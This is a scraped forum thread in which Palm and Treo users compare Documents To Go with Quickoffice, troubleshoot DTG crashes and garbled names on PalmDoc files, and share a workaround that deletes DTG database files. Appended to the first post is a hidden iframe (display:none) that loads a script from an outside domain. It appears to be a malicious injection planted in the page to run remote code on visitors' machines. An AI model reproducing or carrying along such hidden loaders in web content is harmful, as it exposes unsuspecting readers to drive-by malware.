+ Reply to Thread

Documents To Go and Quickoffice Comparison

(Not sure if I should start this thread here since it doesn't get the same traffic as the 7135 sections. We'll see.)

I've used QO for a long time (and most recently Premier) and now I'm checking out DTG. I need native MS Office support and QO converts MS native files into HTML which is not as clean as DTG. Besides that, QO works rather nicely with Snappermail.

I'm trying out DTG and right away, I noticed that it does NOT support my Palmdoc files. Crashes and even a hard reset occurred after the first day of use. The Palm doc files were not displayed with the proper names. The filenames are short and cryptic: "70", "50" "z" and the like.

My files/card/device are not the problem because they are
    visible, readable, and even updateable (with the correct file names) from TealDoc, Qed, and even Quickword. Most of these files have been in existence and usable for many years.

I contacted DTG support and they don't know much about Palmdoc files and even though they claim to support doc files, they are not motivated to look into my problem. I'm not convinced that they will do anything about it so I might just return to Quickoffice.

Does anyone have any idea why this is happening? I'd like to give DTG a fair chance before writing it off as buggy.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I've been using QuickOffice too, but I found it to be buggy too. Memory card support is WAY too slow for me, so I'm thinking to convert to DTG as well (since it will come on my Treo 600), but I've also encountered the naming problem with DTG (not sure why either, I'd wish they'd fix it cause I'm not looking forward to renaming 200 files...). Let me know if DTG responds to your email.

I used DTG from version 3 to 5. I moved to QuickOffice after getting the 7135...but....I have moved back to DTG with version 6. The native support is great. Here is an example of the differences. I have a spreasheet that uses formulas and conditional formatting (changes cell color and font to bold based on certain conditions). I email it to the phone and back to the desktop, making changes on the phone.

DTG - formulas work perfectly on the phone. Conditional formatting does not display on the phone, but is left alone so it continues to work on once the spreadsheet is back on the desktop.

QO - oh my, where do I start, bottom line is the spreadsheet was hosed by the time it made it back to my desktop.

I also like the fact that I can choose to have my documents in native format or the DTG format (for smaller files). It also works extremely well with the SD card.

The desktop app also seems more complete with DTG.

Sorry, cannot help

My wife, the original Palm user in our family, has always used Documents-to-Go and has never had any problems. Now that version 6 has come out, with native file format support, she thinks she is in heaven. She uses it extensively for her research and to edit her doctoral dissertation.

As for me, when I first got my 7135 (my first Palm, BTW), I was going to use QuickOffice -- since it supported native file formats and was included on the CD -- but saw so many posts on this forum from people having problems with it that I decided to follow my wife's lead. Personally, I have not had any problems with it. (Although honesty forces me to confess that my Kyo started to "flake out" about a week after I loaded Version 6).

Bottom line, neither I nor my wife have had the problems you mention. Again, my wife uses Docs 6 an awful lot. Forgive the ignorance but if you could give more details of the problem, perhaps she can duplicate it on her T2.

OK -- here are more details. Excuse the repeated information.

DTG works great for DTG and Native Excel files in RAM and on the card. In fact, so far I like it better than QO in that regard.

However

The problem is ONLY with Palm Documents (you know, AportisDoc/Rick Braum DOC files). I create and use them with Qed and QO and pull them from Memoware and other sites. DTG has problems with them. You first have to "search" your device for existing Palm Documents and Native MS Office files if you didn't install them from the desktop. After my search, my DOCs did not show up with their proper names. The native MS Office files showed up just fine.

I tried to rename the DOC files from within DTG and it would crash. I even tried to read some of the Palm documents and it would crash (even if the names were correct). I think DTG does something funky with names because when I rename a file from within the program, it does not actually rename the file to any other program.

As much as I want true native MS Office support, I need the program to support Palm Documents. I even wish it would support memo files like Wordsmith and QO does.

I'm wondering if very few people have tried to use DTG with DOCs since up until recently it never came close to supporting them. Anyone here successful with DTG and PalmDocs?

You must forgive me for going off-topic on this one. I PMd you my email, send me a Palmdoc and I will try it.

Done and thanks! Make sure you back up your Palm before opening the docs with DTG. You might want to get another reader so you can see how they are supposed to be displayed.

Here is a tiny reader that should work. I used it some time back.

http://www.palmgear.com/index.cfm?fu...D&prodID=30463

Originally posted by Beryl
    I even wish it would support memo files like Wordsmith and QO does.
    Ok, it's my turn to go OT :p . QO supports memos? I can't find a way to make it do that. I used to use Wordsmith and liked that feature. Please enlighten me!
    Please visit my picture site: Robert-O-Rama :)

Originally posted by Robert K.
    Ok, it's my turn to go OT :p . QO supports memos? I can't find a way to make it do that. I used to use Wordsmith and liked that feature. Please enlighten me!
    Didn't you get that message to have Quickword be your default memo handler? I thought I got that initially but since I use CryptoPad, I said "no". Maybe I mixed it up with another program but I don't think so.

Back on topic.

I think I found a work-around to get rid of bad file names in the display list and might resolve the fatal exception problem as well. This procedure got rid of 40 or so files listed with the cryptic names.

1. Use Filez, Filemanager, McFile or any program which allows you to manipulate and delete files on the handheld. I used "Filemanager" which associates files with apps.
    2. Delete the following files:
    DocsToGoDB
    DSDTGP
    DxtgTempDB
    WTG5Clipboard.pdb
    3. Bring up DTG. NO files should be displayed.
    4. Press Menu-File-Search For Files...

I now have a clean list of files with the proper names. None of the bad names are being displayed. I called Dataviz today and spoke with a fellow who reported to being a service manager and suggested something similar but he didn't think it would work.

Nothing got synchronized to the desktop after this so I modified all of them (just recategorize) to turn on the sync flag.

So far (1 hour and 3 uses) no crashes. I might register DTG because I really do want true native MS Office support. The QO HTML translations didn't always work well. We'll see. I will miss QO HTML support however.

I think I found a work-around to get rid of bad file names in the display list and might resolve the fatal exception problem as well. This procedure got rid of 40 or so files listed with the cryptic names.

1. Use Filez, Filemanager, McFile or any program which allows you to manipulate and delete files on the handheld. I used "Filemanager" which associates files with apps.
    2. Delete the following files:
    DocsToGoDB
    DSDTGP
    DxtgTempDB
    WTG5Clipboard.pdb
    3. Bring up DTG. NO files should be displayed.
    4. Press Menu-File-Search For Files...

I now have a clean list of files with the proper names. None of the bad names are being displayed. I called Dataviz today and spoke with a fellow who reported to being a service manager and suggested something similar but he didn't think it would work.

It didn't work for me, I still have only 1 character filenames display when searching for Doc files. I didn't have the DSDTGP or the WTG5Clipboard.pdb file, though.

Originally posted by wcarlson40
    It didn't work for me, I still have only 1 character filenames display when searching for Doc files. I didn't have the DSDTGP or the WTG5Clipboard.pdb file, though.
    Hmmmm. Weird. Please tell Dataviz about it. They need to know that folks are having this problem.

Hmmmm. Weird. Please tell Dataviz about it. They need to know that folks are having this problem.
    I hate big software companies, they make it impossible to contact them (you have to weed through all these FAQ pages, etc.). Do you have a contact email address or a link to a web page where you can submit a question?

Also, can I email you one of my DOC files to try? PM me with your email address if that's okay.

Yes, their website is terrible. The only way I know to contact them is by phone long distance:
    203-874-0085

Crash!

Same thing. My Kyo even crashed. In fact, I'm now thinking I my have unwittingly downloaded or had a PalmDoc on my 7135 when I first loaded the latest Documents to Go version. My 7135 used to be surprisingly stable until maybe a week after I loaded D2G6.

I'm trying to contact DataViz, too. As well as "clean out" my Ky. Again.